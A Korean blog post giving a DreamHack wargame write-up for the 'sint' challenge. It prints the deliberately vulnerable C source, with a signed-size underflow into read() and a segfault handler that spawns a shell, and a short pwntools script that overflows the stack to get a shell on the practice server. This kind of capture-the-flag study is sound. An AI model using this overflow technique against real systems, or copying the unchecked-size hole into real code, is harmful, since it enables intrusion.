Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

CIDY

[System_Hacking] stage13_문제풀이(sint) 본문

Hack/DreamHack(로드맵)

[System_Hacking] stage13_문제풀이(sint)

CIDY 2022. 7. 10. 03:43

 

// 32-bit, nx, partial relro
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell()
{
    system("/bin/sh");
}

int main()
{
    char buf[256];
    int size;

    initialize();

    signal(SIGSEGV, get_shell);

    printf("Size: ");
    scanf("%d", &size);

    if (size > 256 || size < 0)
    {
        printf("Buffer Overflow!\n");
        exit(0);
    }

    printf("Data: ");
    read(0, buf, size - 1);

    return 0;
}

 

누가봐도 -1을 줘서 언더플로우 일으켜야 함

 

from pwn import *

p = remote("host3.dreamhack.games", 20049)

get_shell = 0x8048659

p.sendline(b"0")


pay = b"A" * 0x100
pay += b"B" * 0x4
pay += p32(get_shell)

p.send(pay)

p.interactive()

 

'Hack > DreamHack(로드맵)' 카테고리의 다른 글

[System_Hacking] stage15_문제풀이(validator)  (0) 2022.07.10
[System_Hacking] stage14_문제풀이(cmd_center)  (0) 2022.07.10
[System_Hacking] stage12_문제풀이(tcache_dup2)  (0) 2022.07.10
[System_Hacking] stage12_문제풀이(tcache_dup)  (0) 2022.07.10
[System_Hacking] stage12_문제풀이(Tcache Poisoning)  (0) 2022.07.09
'Hack/DreamHack(로드맵)' Related Articles more